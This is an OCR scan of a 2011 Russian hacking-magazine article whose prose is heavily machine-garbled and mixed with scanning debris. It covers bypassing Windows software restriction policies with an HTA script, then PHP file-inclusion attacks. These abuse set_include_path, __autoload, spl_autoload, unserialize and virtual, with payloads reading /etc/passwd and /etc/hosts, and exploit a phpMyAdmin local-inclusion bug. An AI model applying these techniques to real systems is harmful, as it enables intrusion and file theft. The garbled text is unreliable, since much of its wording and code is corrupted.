На нем читатель test_gpoЗ безвыгодный может засунуть гegedit за

политик. Н о, следовать п устив подо test _ gpo2 какой угодно ехе"шник !диспетчер задач

следующей командой :

наприм ер), симпатия сейчас вничью малограмотный ограничен равным образом позтому может привести в действие

Set

гeg edit. Кроме того , нашел ли у нас лакомиться вероятность удале нного входа во

ТЕМР С:\

систему !по ROP, например) , так наша сестра можем принять сходный финт,
И воттак прямо-таки получил способ засовывать файлы изо корня С: .
Крометог~нестоитзабыватьпрос тандартныедире ктории,изкоторых

да токмо из одной учеткой !демонс трацию можешь оценить на этом
видео- Ьit . ly/pXsBj 0) .

разрешен включение ехе-файлов:

lPIOKB. ВСПОМИНАЕМ ПРО НТА
• %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SystemRoot%
• %HKEY_LPCAL_MдCHINE ~SO FTWARE \Microsoft~Wi ndowsJf["l., _ _ __
CurrentVersion\SystemRoot%*.exe
• %HKEY_LOCAL_MACНINE\SOFTWARE\Microsoft~Windows NT ~·---­
CurrentVersion\SystemRoot%System32\*.exe
• %HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows\
CurrentVersion\ProgramFilesOir%
Они разрешают включение ПОтоль ка изо папки

Windows равно Ргоgгаm

Files пользу кого пользователей . У обычного пользователя неграмотный т потенциал

Последний хинткасается неофициальны хисключений,накоторыене

д ействуютгрупповые политики. Вадиме Подане написал во благе от­
личную серию постов, посвещенных SRР-политикам. В частности, некто
обнаружил атомный путьдля их обхода да вслед за п уска произвольнаго заключение

lgoo.gi/BmBsm ) не без; использованием приложения НТА IHTMLApplication).
Итак,последовательностьдействий:

0.

Создаем файлик вместе с эталонно таким текстом :

gjTML >
<scriRt lang@ge;" v bscript" >_ __
~gbox "I"m dang..,
eL
ro
""u""s"-"
v""
в_,c."o,..,d,.,e"-!"-"
! !_" _ _ _ _ _ _ _ _ __
~/s cript >_ _
</HTML>
0. Сохраняем его не без; ра сширением .hta !например , execute_this.hta).
0. Создаем прозвание пользу кого него .
0. Открываем ссылку - да hta запускается .
Над насчёт ли говорить, в чем дело? на смену вызова безобидного MessageBox "a
VВ-код может изготовить на системе что такое? угодно? П касательно литики

SRP долж-

ны инспектировать сполна адрес , ко торый может исполняться, на книга числе равно

всевозможныескрипты.Однакоиз-затонкостейработыгрупповых
политикд анный отвод работает. К аналогичным « глюковатым •• рас­
ширениям кроме НТА Вадиме относит

REG, MSC, НТА , СНМ. Точно

этак но состояние наблюдается равно вместе с соm;файлами lв книга чи сле всякими
олдскульными ДОСевекими программами, которые постоянно вновь разброса­

ны во п апке винды). Они никак не у читывают правил а гр упповых политзаключенный , в такой мере
по образу работают во виртуальной машине
------~·""

005 .

.__..

~"

c : \GpDisaЫe . exe

c:\GpO -:.ы..ехе

Как твоя милость можешь заметить, всевозможныхлазеек полно. Их разнообра­

Windows connot open this pr~om Ьecouse t hos Ьееn prevented Ьу 0 softW41"e restriction polcy. For
Event- or cont«t ywr system ~rlltor.

ок

0

зие равно ухищре ния никак не могут безвыгодный ошарашить . То, который ваш покорный слуга скажу дальш е, может

тебя удивить . Даже объединение из ле перечисления всех сих способов ради обхода
ограничений автор этих строк всё-таки а напористо рекомендую безвыгодный пр енебрегать их
использованием. К тому но пока что твоя милость можешь учи тывать реальность

применения сих лазеек равно от стократ большей вероятностью настроить
Обход посредством вариация переменной окружения

ХАКЕР

00 /153/2 011

систему, которая хорэ хватит защищена. ::J:

069

взламывание

PrOxorKotov lhttps://rdot.org/forum/1

ЬIСЯЧа

И ОДИН
инкл ;ц
розыск

УЯЗВИМОСТЕЙ
КЛАССА LOCAL/

REMOTEFILE
INCLUDEHA
НОВОМ УРОВНЕ

• www.php.net/
set inc!ude path
оnисаниефункции

set_include_pathll;
• www.php.net/
.l!fi.Ш.ig)jn ­
оnисаниефункции

unserializell;
• www.php net/
:tir.l!!.i1 -onиcaниe
фyнкцииvirtual!l ;

• www ohp net/
~ -оnисание
метода
autoload;

• ь;цy/nWvefG

содержание получай форуме.п!21.

Первое , в в чем дело? бы мы хо тел устремить почтение , сие отправления

set_

ш:g, посвященная

include_path(), которая устанавливает дир ектории к

магическим методам

директивуinсludе_раthидаетвозможно со тьманипуляцииработой

__ autoload во част­
ности ;

инклуда во

операторов include(_once)/require(_once). Такая махинация ста­

Широко известно, что-то причиной

• bjЦy/odY5zS

новится возможной на от лучае , неравно во РНР-сценарии отнюдь не задан глубокий

-немного относительно

линия для nодключаемому файлу, ведь очищать вначале спешный обложка ищется во

возникновенияуязвимастей

• www.ohomyadrnjn.

класса LFI/RFI во РНР-движках
служит вероятность передачи

spl_autoloadll;
оо-официальный
сайт phpMyдdmin;

• Ьit )y/nV1 njG

сам

с LFI-эксnлойтов

АЛЯ phpMyдdmin"a.

произвольныхданных на операто­

п у тя х изо

include_path, а затем- во рабочей директории скри п та.

Тем самым, когда автор сих строк сможем передатьсвои nроизвольныеданные

на set_include_path [или во ini_set("include_pat h", [данные] !. что-нибудь
аналогично, так несомненно изменим итог работы

include.

Для nримерадавай возьмем абстракт ны й адрес РНР-приложения, на
одном с скриптов которого я нашли следующее интересное место:

ры include[_once] да require(_once].
set_include_gat h(.$path . PATH_SEPARATOR . get_include_Rath().);

На самом деле подсоединение

i nclцQ_e _: :myЦ~php_:"_; ______________________ . _____ _

файлов для РНР-сценарию не возбраняется
0

0

воплотить в жизнь равным образом множеством дру­
На нашем дискеты

гих, в меньшей степени известных способов,

сможешьнайти под­

об эксплуации которых да пойдет

видео ко во всех отношениях

фраза во этой статье.

070

робноеобучающее

Д оnустим, что-нибудь на данном от крипте да мы не без; тобой можем щекотать нате переменную

$path. Например, возлюбленная берется изо базы данны х, во ко тор ую у нас питаться до­
ступ, alias но ее не грех предложить во админ-панели приложения, во которую

пишущий сии строки тоже можем п подняться . В общем , вариантов существует великое

описанным во статье

множество. Легко понять, что-то таким образом автор сих строк сможем проинкл рыбачить

методам инклуда .

обложка

myclass. php

с всякий директории.

ХАКЕР

00/153/2011

Тысяча равно сам сообразно себе инклуд

Конечно, самоё в соответствии с себя отправления

set_include_path(), которая при­

нимает произвольные пользовательские материал , отнюдь не является таковский
у ж сильной угрозой безопасности , только буде во часть ж е nриложении одновременно

-. ..,

обнаружится незащищенность подобно << file manipulatioп >> !то принимать я можем

W. f..Jf iS1"D t"IIIJI! ,

создаватьфайлы вместе с прои звольным именем!, так тутуже радикально возмо­

•P l _ ... ~ol o ...
jPIU" S >• 0. 0 .l)

жен ниженазванный п оворот событий :

0. Создаем во /tmp обложка из именем myclass.php !nрава доступа возьми эту
директорию как правило

0771.

ТЪ ~• t ww:цo 01 t•
.., ,

t nt.e -CI t.o Ь. ... ~ ,.. • Mt • IIJt. UJPI -11 ~81.1 o10 tor _ • uwlo.c! IJ. lt I>OC.I>IDO • • "

..,.:- C ir iC Ь.IItll 0 0f \l... t.IOJ188IIIh

U.Н II

to r

an y

l 0 tc r

t • " """ """"" anct 0\l ~olo.od_reol •r•r o

c • I110_8 08 C O I IКd /l.

0. Устанавливаем $path=/tmp/.
0. Обращаемсяк не без; крипту, во котором естьуказанный меньше код, да на­
блюдаем спорый инклуд файла myclass.php иэ директории /tmp .
ep l_euto l o8<1 0J .,pllp811t ·

0/ php_e pl . e

Ты , известно же, спросишь, если бы у нас поглощать допустимость создания

~II P_r tж TIOII(8pl_ •ut.olo 0od )

произвольнаго файла держи сервере, в таком случае к чему уже свершать по сию пору сии

a h•r " 0" 01188. , 0 011_" _ , "HI•. • • c• • 0"L. <i[ 0181 0 I O-.d_. ~ ИN IO III ) 0
l nc.o i . . • . -.I •D,HI•.••r.e.le n•B•L.<iC a .... o l o.d_e• t.• ,.. ,o,.._le n),toulld • OJ

<< лишние » действия.

c tu.r •oopy, • po•t , " 010111

Здесь поглощать сам капитальный момент: этак в духе автор расматриваем

у язвимости прямо РНР-скриптов , в таком случае отнюдь не есть смысл перезабывать , который получи

Описание <<Н ОВОЙ» инклуд-функции spl_autoloadll нате сайте китайских хакеров 00vul.com

подавляющем большинстве веб-серверов РНР после п уще н по образу устройство
Апача да тем самым отнюдь не обладает какими-либо особенными правами ,

function __ autoload($class_name)

в дополнение www/пobody/apache. Чтобы развернуть слабость вроде << file

{ -

manipulation », да мы вместе с тобой

include $class_name;

должны сложить обложка во корневой директории

на е ба, нотам в корне может равно отнюдь не присутствовать каталога, достуnного держи вслед nи сь

}

____

средствами РНР. _

set_include_path($path. PATH_SEPARATOR . get_include_path());

АОБЪЕКТОВ
Следующий крупный ме х анизм, тот или другой как и nозволяет маниnули­

$cookie=unserialize($_(OOKIE[ "auth" ]);

роватьданными во конструкциях include(_once)/require(_once), сие
возможностьавтоматическойзагрузки объектов .

Далее вновь предnоложим , что-нибудь автор можем щекотать возьми переменн у ю

чать файлы вместе с описанием классов механично минуя использования

$path. Тогда , з адав $path равным <</etc/» равным образом nо вместе с лав на кукахзначение
auth равным << 0:7:"hosts":e:{}», я вnолне сможем проинклудить
обложка <</etc/hosts». Д анный видимое дело относительно nи звание невыгодный только лишь на официальной до­

include во явном виде .

ку цемент а ции РНР, такж е кое-какие nримеры дозволено откопать равно на что до б суж де­

Широко не тайна , аюшки? на РНР>=

0.1.2 равным образом перед этим была реализована
удобная << магическая » связка __ autoload, nозволяющая подклю­

Если устремиться ко официальной документации , в таком случае наше не заговаривать зубы

вnолнеможетnривлечьтакоезам е чаниеотразработчиковРНР :

ния х получай фор у м е гdot . oгg !с из ылк у ищи на комментарий х!. Говоря об __ autoload,
не велено отнюдь не перечислить да по отношению эдак называемы х SР L-функциях, скажем

sрl_аutоlоа~котораяимеетдовольнозабавнуюнедокументирован­

If_the class name is used e.g. in call_user_func()
then it сопение contain some dangerous characters such as .. /.
It is recommended to not use the user-input in such functions
or_at least verify the input in __ autoload().
Данное послесловие означаеттот факт, что-то разве наша сестра можем брать получи и распишись

н у ю возможность, описанную пока что на

0009 г. нате сайте китайских хакеров

BOvul.com:
<?php spl_autoload(" info", " .txt " ); ?>
Данный схема вполнеуспешно выnолнит адрес с файла

info.t xt.

габариты функций , оперирующих названиями классов, в таком случае стано­

вятся возможными уязвимости подобно LFI/RFI. Например, воттакой шифр
полностью ага ет способ проинклудить обложка

/etc/passwd:

IRTUAL:HAЯ РЕАЛЬНОСТ
Еще одна РНР-функция, которая nозволяет<<nроинклудить» файл, сие

v iгtualll . На самом деле возлюбленная чрезвычайно отличается через вышеnеречисленных
конструкций , таккакееиспользование э квивалентно<!··# inсludе

function _a utoload($cla ss._name) { _
__r::g_quire_once $J;.lass_o_~@p " ; __
}

____

virtual ... ··>в mod_include, ведь убирать симпатия

-·--------·-··--·-·------·-··-··---·

call_user_func(array( " •• / •. /_,_,./etc/passwd".e", "test" ));

от криптов , shtml-фaйлoв равным образом не выделяя частностей токмо , аюшки? дозволяется отдубасить при помощи

Apache . С
Ко н ечно же,

call_user_func()

безвыгодный единственная деятельность , которая

общей сложности как только выполняет под­

запросдрасhе. Используетсяданная функциядля n одключения СG I­
РНР-файлами сия занятие в свою очередь работает вnолне сносно.

Если у нас получай сервере вкушать воттакой вместе с криnт :

nолучает на качест ве параметра кличка класса иначе обьекта. К числутаких
функций равным образом с н осится да многострадальная

unserialize(), nричем

<?p hl) virtual(" info.php " ); ?>
- .__ _ _ _ _ _ _

nользовательские факты nоnадают во эту функцию значительно чаще , нежели
на

call_user_func() .
Однако после этого очищать да отдельный ограничения . При десериализации

...то nри обращении ко этому скрипту во браузер попадет итог
info.php.

выnолнения файла nод названием

объекта имя клас из а проверяет не без; автор нате валидность, таким образом,
ты да я отнюдь не сможем nротолкнуть во имени объекта кое-что может статься << •. / .. / .. /etc/
passwd». Тем неграмотный в меньшей мере у нас полностью nолучится проинклудить обложка с
того а каталога, гд е держи х оди тся равно выше- скриnт .

Если намотать себе на ус всё написанное перед этим за поводу функции set_include_
path(), так становится возможным инклудлюбых файлов с первый встречный
директории.

Представим , в чем дело? нужное нам веб-приложение заключает технология __
autoload, функцию set_include_path() равным образом функцию unserialize():

ХАКЕР

00 / 053/2011

GOOGLECODESEARCH
Для nовышения своего левела ба го коnателя со оветую войти получи

google. c om/codeseaгch , прибрать во качестве языкадля поиска lang:лphp$
равно пошакалить на движкахописанные во статье опасные конструкции :

set_
include_path(), _autoload, spl_autoload(), virtual() равно unserialize().

071

взламывание

_$.this- >- errQ.C_~_o nfig

01 ·

W l •c.ol ~ 081 ) 01 ~ltoley_..,:J

относительно

g ..,_. . -•

.::!-c:::.~..."!!.:~.ю~~~:-..::..."l~o«..-!.o"::t,LOZ.:",_,gь_s;;;;;:oe""yc~
..---..._.,,a-..ot"..,..,.,......
.......

Дан·ный коддает выполнимость корректной обработки ошибки

,_.,,....._.~-"""" " 0S·S)-&.IAII~..,_ •.,,e.-o:;-.-4t11"4Soo.ro:•-"""""""~ttr " I .6563!Тiys-o / illod.........,~ ... ,.,·~-К63310r1tм
...,.., .,,.....,~i"""" · 0 •эc.-•,.-

-.-·~-·8"e-s..o.yo~~tN.,..-...o,.>...."

.. ,_,".,,,.,м..,p.,...-............,.м~-..

туман си нга конфига [написанном получи и распишись РНР) на случае его нессторожной

... ShoiDн ...... ~y"...,_.,._.....,..P .• 05:2!i:S..._.s.ьm.. ..... u..r"*"•~....,....Ju<rh~.......,..xa~o.wv...~ ..... /lnJio..."

tolld":U.n.Sк

.......

"""""""- ":53:S38n1Sondl>t"lrlloo<lo.............,,..,.r·.Q6:"Pк~ocf,. .. ,._",.,_,.,,.,..,..~~~~..J*td " ~:6ol~,_..,-~,-""":"i<I"""""

*" " Иfi1Sdr"p

модификации кем-либо.

,...".,,._.""""IJ~--"- IS6661JUCP~o•Joodopoolд.oocpj;ll.t.loc:Nul\oc_...,к/uoc,.,....,..,., .• 08 .6.Pott01koo-t.--mttfllll.todt~-·,ID_IЭQWO"IIWodtWM
o..м.-.,, , ..,._
.fМЭ,I~~QМUft1."->Ьit~<I
"TIXI1.0Uиrlo.-..ra .-~,~..,oql-"811 .811111j-SQ..~-•it1ttltJ~

............ _"".
..
..
=.:-,::с~:"-~"7с::==~оо:~~~~=~~-~~"":9";--~~~~~~·~~~..:;::.·~в::..~
S\lpoNotl. hOOI-tl\d-" l l o--(J/...anytyOIOM(IoiO<MioO "hOOifUtl/tЬot\/JooiOtlnaptt11111t" L 0.6Syt l tm L I .....-......,..IIIo\:" )"71!10цoiooC-...0Soщ8lfU4r/t~

.

То глотать разве конфиг блик довольно включать ошибки, ведь нате вот как ран

ny " I &БSllflySOIIdЬooJ.Л.~~oJntm"56!633~s..dDoo:lluod~t- - " 01З.Goont op-:N""-•"""~-:·e.t-Sua!Jti-.IJ\ftll~

выведет ся ко расиво оформленное сооб щение вида

<<phpMyAdmin was
to read your configuration file! » на смену << Parse error»,
которое бы появилось возле использовании in clu de"a.

...."•ttloliall r.l onPotttм."otiO<oi-·Л.odo............, o ol>d." "2222 . So<: .. o ~OOI,__, ,.,~..,.,_чo. " 05. 01!5-.;ls.-....,uo .. .-o ,.olldt~ANdl~
........ ".161EiS...._.Oof,.. IJifl_,....r~·Лжlo~- · SЭS.JIIilociS-~I.Amfo~"""o"J".6262.P""kfl,illtrPff-\lllf~01.,.Aiottlo....",...,..,.}llo<rt"Ь. .&ol .. . .
,......._l<wlo.... r."-lo.............,_hp . " ИI!I!i41o<,,..... _ _ ..",.1J\III/......... IIIiЦI"Ii61i6WCP,......,_uotrМdo,...,_~ 0\11111oc o i"IЬI•odwo:~ l fi"OII . " 015.0Pa.,~o

unaЬle

===~~~~:=·=-";;~~...=::"-""~~~·~~~-:;"":"~~.~-:~.
"
.............
...........
--f"i1t ." IOO<IIIXXI.IU01W~

l

file - false;_____________

_ $.t_his- > sg_u_r_~_mtimg=fiJ.emt.:lm~.CH..hi..~>-gg:!;$.QJJ_r_<;g_{).).;
_ }

-tl~-.lrlld~IIIIS-Iro51.11tll.-~lldJoi

:.~?""",..,o.ooкn.•.,.,•••OOO""""

0

( I - " " " (( ....

._...,.....(( Pi P-. ". )(06мoo"""l

HPMYADMIN
Теперь , со временем того как бы твоя милость намотал всё вышеописанное нате ус, выкладывай

I

@Co<poщ•-•~-"-•lal"louJo"" fмo-••PUI .... J""" I ~OI-1

Q

Qn..w... III,.08ta.~.... "-< _
~аn..-о

•Т •
касательно

.;

m..- or

.....".,...,_111 ...,.".tto\JMJO

х

0

t.._ Оо ........ ои / с..ю..

"

Q~r)poo6.pom-

tollllltlal . o•...,r.o., .м

,.~.,

.....- с-- /

.."...•...._,.,., ,_, ,1 .......,.• ..._......,_,,
lll!p~···· ""ff

Х

nродолжим начатую во прошлом номере журнала тем у потрошения

0

_.. _, , ,.... , нех,к,. в отношении ,..

ом.оl мо

-:\~~~

.--_о~.,,_.....

!!11.(17~03" 0 028

phpM yAdmi n"a . Как твоя милость сделано помнишь, на июле сего возраст во phpMyAdmin "e

==
со -•

нашли целую плеяд у багов, а в свой черед несписанные на Н двуха вдоволь

....оо•

интересных инклуда. В паблике получи миг написания статьи инфор­
мации что до ни х бери хо дилосьдовольно мало, приводились только лишь куски у яз­

"

"

вимого кода, что, конечно, далеко не раскрывает всей сути сих уязвимостей,
по части этому ну рассмотрим равным образом х поближе.

LFI во phpMyдdmin"e на файле sql.php

Такж е отмечу, ась?

virtual

равным образом

Итак , первым до списку по рукам местного характера инклуд на файле ./
libraries /d isplay _tЬl.lib.php. Уязвимы однако версии phpMyAdmin"a
вплоть давно 0.3.1 0.1 включительно равным образом предварительно 0.4.3 включительно .

spl_autoload - сие пользовательские

функции, т ем самым их позволено эксплуатнуть на качестве callback"oв .

Информацию об этом инклуде дозволено отрыть получи и распишись официальном сайт е

оживка во разделе Secuгity IPMASA-2011-8) .

Например, viг tual позволительно вызватьдинамически из ледующим образом:

.s ~IШR-----·--·---. ·-·--------·--..-·- --------·-----· . . ·-·-.. .--..-----·-.$~Jl1-=-". vir_t ual" ; ___ ·········---·-····-·------..--..--....................
$path( "myclass.php" );
?>

--Прочитав a d v isoг y, ну-кася взглянем держи патч, предлагаемый разраб по части т­

чиками интересах ветки 0.3.х [вообще досматривать после патчами разработчиков
постоянно хватит небезынтересно , в такой мере в качестве кого немного погодя спокон века позволяется отыскать мол ся тки

малоизвестных да сейчас пофиксенных зеродеев).
Сам патч выглядитпримерно так:

... тож делегировать что параметр на call_user_func() :

,L).j,J!.r11.r::ie~l!:t~iR.:I..<~y_tQJ._,:J,:i,!! ,RhiL(PllRМYAd.miD_3.,,3 .lQ)_______
Jf ($GLOBALS[ " cfg8~:J.atiO_Гl] [".m.:im.gWQГ..is ] ________ _

0L .· -···-·-···--··-----h~l_user_func( "virtuaJ

", "myclass. php" );

&& $GLOBALS[ "cfg" ][ "BrowseMIME" ]) {
if (isset($GLOBALS[ " mime_map " ][$meta- >name][ "mimetype" ])

?>

) {

EVAL==EVIL
: H_f1~1.цgg_ij,:J,g_:"_ $(J_lQ~.8lS.Cm:\..r!l_g_ПJAP "J[$.mg:t:A.:2DiJ.!Il_g] ________

Ещ е одна важная конструкция, которая позволяет облечь в мясо и кровь адрес изо

указа нного файла, сие

__[:tпшforJn<!:t:!oD..".1_______ ______________ _ __________ __

eval(" ?>" . trim(file_get_contents(" info .t xt" ))).

±i:iщ:Jude fi.le=Pм.A_iecш_gJ"_a.t:.Ь..($GLQ!"!дL$[mJm_g_mщ:э. :J[$m.gta- > OEm!:!]_

В nринципе , симпатия даеттот а самый р езультат, аюшки? равно использо­

вание include/гequiгe, однако близ этом существуют некоторы е нюансы.

[" traпsformatioo "J);

Во-первых, симпатия малограмотный оптимизируется акселераторами, тем самовольно ым около
ахти частом исnользовании данной конструкции могут взору

проблемы со быстродействием. Во-вторы х, получи и распишись file_get_contents() во
eval() малограмотный действ ует приказ allow_url_include, тем самым, йес ли
allow_url_fopen=On [данная опция в области дефолту имеет именнотакое

значение), наш брат полностью сможем nодключить вынутый файл.

-·""•-•"" \ji"""""!>ortuowu "" CI

Кстати, не что-нибудь иное нынешний без затей видимое дело равным образом дает закачаешься змож только не без; ть таково для от так

добить вместе с автор выполнения стих во известном эксплойте << phpMyAdmin <=

0.1 0.9 unserialize() arbltrary РНР code execution exploit >> [ Ьit . ly/qW 04f 0 ) .
Волга зрабо тчики phpMyAdmin "a п осле выхода данной уязвимости во
паблик убра ли изо стих своего отметина всего-навсего всего лишь опас н ую функцию

unserialize(), оставив возле э часть невыгодный поменьше оnасный прием load на классе
PMA_Con fig вне изменений. Причина сего непотребства кроется во
следующем куске стих изо метода load:

-

· ~.........
. .....

- ~~-

·-·

Autolo•dinv Cl•••••
dw~ •rnln9o0Je<!-<~<1lf"lted ~IIOnf

-..

t;n•tt

anti"НPIIOU"ot

No

r--dиt <kflмlon .

on.

or u-o.~t.....,..~...cn

tS

0"1.1~

to

• wnt~ ~ 0ot>Q " " ot "«Oed lndo.IOe$ •t ~ ~ornno of tiO"I ~~ (orw: for tW"I dns).
Jni"НPS,Ihis~no~nкtп.-y . YouiNVCМI"nt..-._O<Jtolol(ll"l..nl;t\Onwhkh~

.... -~yцltcii"I(.IISI"f(IUirf\J"o"W"9ШUSfl

=:,s~=..(-..tw;htцosn"tt>«nckr..edver.ev~tl"li:sf\пctiQntheseф~fflQitlalsototnllastcNnc.ttokжlthedasЬt~PНP f/lls

• OI>JO<I1--

~ ~;~o.--

............

o OI>,..,I......,..,..
,.~

n.r-

PnortoS. 0 .0,tx cepliorlstt-n:.wnl"ltht_.utolo«<~<»uudr>OtЬtC11141t .,lhe i:AUll block.-.:lwoulcl~l"lthlt.lltm11". 0"rem

S.3 .0+ txoeQUQt\S tl"lro:>•l"l n U"W:_~ ~<:«1 Ье t81.."Qf\tn lhe WJ.St1 Ыоdс, WRh 0 Of<IYISIМ, lf tl"lro:>llnQ 0 OJStorntXQPtiOn. I1WI
the WStOII"It1<«Pt\Ofldll"i mustЬ.tVIiLitJk- Тht _ ... 0~ ~ IП-/IV Ье \l"l~fto.n!Vtl-; 00-..~ tht QJStornUCtj)t\OfldiiИ •

.... . ..
·-• oe,...
~

-~

• otolo<I:C-._
o C-М"<"\10./0(tl

• Т•"­

$.eval_resul"~;__..=______
---····--·····--·---·-··------eval( " ?>" . trim(imj:)lode(.":.\n", file($.this- >gtl$.o urc~()))))~----------

" """"--.
...................
. оо,.

o OII;.<Ihnolo<• OOf"C~ ........ ,

lfo:hedl nl\an\e~ut~t-Q.n ~ o:t\ef"lltCIO"\COI"I~SOtl"le~CI"III"O<:terSI>.IOIИ . /. I tit r~t9notusttr.t
USotf-r(>Utoni>.IOIIUncl:lornio.-ltlt~ l "l"tflll/tht.,...tlrl

..

_ _.tOioad( ) .

,,

fur>«ior~

_..to1wd (, c1•t•....-) (

; ...._tudo; k1иo..n- . ". php " ;

if ($eval_result===false )
_____$this->error_config_file=true;_

l oЬj

.й~-------.............................................................................. ··-------------..·--..--·-·-..-·----{.
.... _,_ .................... _",_"_ .......- ......- .....- ...- -....· - - - - - -....- .....,_..
__ ___ _

__
072

____ _______
"

мw 0+,<1*>s 0();

~оЬj2 • мw ll)<1 .. o2 ();

,_,

Описание магического метода __ autoload для сайте php.net

"_"

ХАКЕР

00/153/2011

Тысяча равным образом единовластно инклуд

">phpMyAdmin

ht!p :/•rn:Zi"IPIP/p~дdmh,/server _sql.pl-p?IDken=ЮJ5909lade746777SбdбЬ17deЗ2cЬd9

(_

tвJ самые гюпу~

0

01"1<11Ючить •

~-:"~ [Х

- Mozilla Firefox

D начапьна_я страwца

.1. Coakles •

/

<:J

-11-tf · Goo9le

• Лента новостей

оu.ибок css нет· ~ Формы· 0:.!!1 Графика· О ~· ~ Раэное • Jfl Контуры· 0!!11 Размеры· );: жструменты • ~ КОА •

0iJ настройt<и •

mlocalhost
@! Ба>ы .о.анных

.{J SQL

О Состояние

Выполнить SQL.>anpoc(ы) получи сервере

{j) Переменные

0ocalhost":

ф

IИJКо.о.мровхи

i! Тиnы таблиц

Gj11 Эксnорт

G!j"! Mмnopт

i~t~ Синхрони>ироваn.

- - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - . ,

CU.Atl TAВLJ " test " . " paatest " ( " colwm naae " IHT NOT JIULL , " aiaetype " IllT
НОТ JlULL , " tahle_naae · TIXT JlOT НULL ) -INCINI • !IYISAК ;

{ Разделитель О }

llаПроцессы

НОТ

WLL , " transtoraation·

ТIХТ НОТ

NULL , " tran.stora•tion_options " INT

НОТ

WLL • " dh_naae " TIXT

0 Покаэать заданный заnрос в который раз

tJ
Создание «ядовитой >> таблицы на

phpMyAdmin
во массиве

reguire_once " .Ll ibr aries/ transfor mat i ons/ " . $include_file;_ __

званием

$_SESSION не в таком случае — не то долженствует бытьдоступ ко базе данных по-под на­
<< phpmyadmin>>(вообще буква хранилище данных может кликать ся

да по-другому, таково наравне ее этноним определяется конфигурационной
Из приведенного перед этим стих становится ясно, который к реализации

переменной отметина

данного локального инклуда необ хо димы следующие условия:

0. $GLOBALS[ "cf g" ][ " BrowseMIME " ]

==

true. Сразу скажу, чтоэтоусло­
./libraries/config .

вие по большей части короче выполнено, приблизительно на правах во файле

default.php

указанная аргумент согласно умолчанию выставлена на

tгue. Влиять для эту переменную да мы со тобой отнюдь не можем . Если преисподняя мин сменил ее

config.d efa ult. php, равно н клуд нажить сейчас никак не удас тся .
0. Должны бытьопределены массивы $GLOBALS[ "cfgRelation"] равным образом
$GLOBALS[ " mi me_map" ]. Массив $cfgRelation играет порядочно

ма ссива

$_SESSION во ф у нкции parse_str(), обнаруженная Mango,
phpMyAdmin"a, зачем равным образом рассматриваемый
инклуд. Таким образом во $cfgRelation ты да я слегкостью можем запи ­
имеет простор на тех а версиях
сать нужные нам данные.

Единственное, что-нибудь снова нужно знать, сие важность переменной

значительность на

важн ~ю gоль нет слов всехуязвимостях, касательно которых пойдет речь, следственно автор этих строк

$cfg[ "Servers" ][$i] [ "pmadb" ]).

Важноотметит~чтоужеизве стнаятебе перезаписьпеременны х

$GLOBALS[ "server " ]. Этапеременная определяет, вместе с каким сервером
базы данных пишущий сии строки будетсоединяться. Обычно phpMyAdmin соединяется
вместе с единственным сервером, равно сила этой переменной хорэ в равной степени 0.
В коде оживка предусмотрены непохожие варианты работы со мно­

со всеми подробностями опишу, каким но образом симпатия формируется.

гими серверами, поэтому, в надежде верно знатьзначениеэтой перемен утнапиштим ,
Итак, отваленный скопление задается функцией

PMA_getRelationsParam(),
./libraries/relation .

которая, на свою очередь, определяется во файле

намдостаточно окинуть взором нате кукисы, выставленные нам phpMyAdmiп"oм:

"pmaUser - " . $GLOBALS[ "server "] равным образом " pmaPass- " . $GLOBALS[ "server" ].

lib.php:

Идем далее .
Массив

function PMA_getRelationsParam(.$verbose
{_

______

=

false )

$GLOBALS[ "mime_map "]

задается вместе с через функции РМА_

getMIME():

if(empty ($_SESSION[ " relation" ] [$GLOBALS[ " server " ]] ))

./librarie~/transformations.lib.php_ _ _ _ _ _ __

{

function PMA_getMIME($db,

$_SESSION[ " relation" ] [$GLOBALS[ " server " ]]=
___ PMд __ getRelationsParam()_;,_ _ _ _ _ _ _ _ __

____________________________________

_}

_ $GLOBALS[ "cfgRelation" L=_$_SESSION[ " relation" [.$GLOBALS[ "server" ]1;_

$tаЫе,

$strict=false )

{
~~Qm_qry~-~---------------------------------------

SELECT ·column .un~am~e~-4------------------­
. mimetype~"---" transformatioп · ,

return $_SESSION[ " relation " ] [$GLOBALS[ "server" ] ];
___________________________
___

}

Если на массиве $_SESSION неграмотный задан составляющая relation[$GLOBALS
[ "server" ]] , ведь спирт задается чрез функции РМА __
getRelationsParam. Е сли но этотэлемент зада н , в таком случае возлюбленный для сто
возвращается. Функция PMA __ getRelationsParam определяет
массив$сfgRеlаtiоn,руководствуясьзначениемпеременной

$cfg[ "Serve r s" ] [$i] [ "pmadb " ].
Если достоинство этой переменной никак не задано, ведь совершенно азбука

массива

$cfgRelation будутиметьзначения false иначе говоря null. Е сли
но аргумент $cfg[ "Servers" ][$i][ "pmadb " ] определена равно доступна
соответ из твующая основа данных, так скопление $cfgRelation опреде­
ляется на соответствии вместе с этой базой данны х. Таким образом, даже если
автор хотим засыпать во конгломерат

$GLOBALS[ "cfgRelation" ]

нужные нам

значения, у нас должна присутствовать вероятность перезаписи переменных

ХАКЕР

00 /153/201 0

" transformation_options·
FROM " . PMA_backquote($_cfgRelatj_on["db"])"--"-- - - - " , " • РМА backguote_($J;fgRelation["column info"].),~----WHERE . db name·=:--.· " • PMA_~lдddslashe_~$db~_
· _ __
_~_.:..\: _______ _
AND ( " mimet)"pe" !=\" \ " . (!$strict ? " ___ _
OR " tra nsformation· !=\ "\"
______
OR " tra ~form a tio n_options· !=\ "\" : " ) . " )";_ _
return РМА DBI fetch result(.$com_gl"y, "column name", _ _ _ __
nuЦ,_$GLOBALS[ "controllin k" ])_;_ _ _ _ _ _ _ _ _ _ _ __

}~-----------------------------------Если я хотим, с тем скопление

$GLOBALS[ "mime_map" ]

содержал

нужные нам данные, я должны основать свою произвольнуютаблицу на
БД . Если буква реальность у нас есть, в таком случае местного характера инклуд в полном смысле слова воз­

можен . Теперь самое период выяснить, вроде равным образом от случая к случаю вызывается отправления
PMA_displayTaЬleBody.

073

хакинг

: Srr""St: vc/rt~/М11t.r . ,nllllll , • 0. 011 01•111/N 01: tt :H ..,...., u, S

первая схема , во пашня taЬle_пame -имя первой таблицы.

rнt : • : I: 0: C.Witt t. : /rнt : /111/Cf~
t -: •:1:1:"-""""""11"1• s.,...н.,. :/rнt : /loill tc••

• - : • : 0:1 :...,. t f ....,

.,.t..

Наличие на базе д анных т а который таблицы позволит фи н кции

,.-кнsн : /rнt: /nr/И III/н l.,t •

